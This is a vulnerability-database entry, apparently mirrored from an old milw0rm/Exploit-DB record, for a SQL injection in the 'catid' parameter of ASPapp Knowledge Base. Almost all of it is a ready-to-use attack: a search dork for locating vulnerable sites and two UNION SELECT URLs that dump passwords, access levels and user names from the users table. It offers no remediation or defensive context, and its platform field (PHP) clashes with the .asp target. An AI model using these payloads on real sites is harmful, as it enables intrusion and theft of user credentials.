ASPapp Knowledge Base - 'CatId' SQL Injection (2)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056881 漏洞类型
发布时间 2008-09-27 更新时间 2008-09-27
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/6590
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Dork -  content_by_cat.asp?contentid ''catid'' 

Exploit : 

content_by_cat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,user_name from users

Exploit 2 :

content_by_cat.asp?contentid=-99999999&catid=-99887766 union select 0,null,password,3,accesslevel,5,null,7,8,user_name from users

DownLoad Site : http://camyuva.bel.tr/who.php

# milw0rm.com [2008-09-27]